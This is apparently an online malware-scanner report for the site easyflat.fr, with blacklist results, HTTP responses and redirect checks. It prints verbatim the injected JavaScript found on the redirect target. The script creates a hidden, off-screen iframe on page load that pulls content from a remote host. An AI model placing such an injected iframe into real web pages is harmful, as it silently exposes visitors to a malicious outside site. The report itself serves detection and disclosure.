Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=easyflat.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://easyflat.fr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.easyflat.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 26 Jun 2014 20:05:17 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.lauregossetgrainville.com Server: Varnish Content-Length: 315 Content-Type: text/html; charset=utf-8 | clean |
http://www.lauregossetgrainville.com/ | 200 OK Content-Length: 9489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://flattware.rayflatt.com/FONTS/news.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://www.lauregossetgrainville.com/js/ieupdate.js | 404 Not Found Content-Length: 823 Content-Type: text/html | clean |
http://www.lauregossetgrainville.com/test404page.js | 404 Not Found Content-Length: 823 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: easyflat.fr
Result:
GET / HTTP/1.1
Host: easyflat.fr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: easyflat.fr
Referer: http://www.google.com/search?q=easyflat.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: easyflat.fr
Referer: http://www.google.com/search?q=easyflat.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.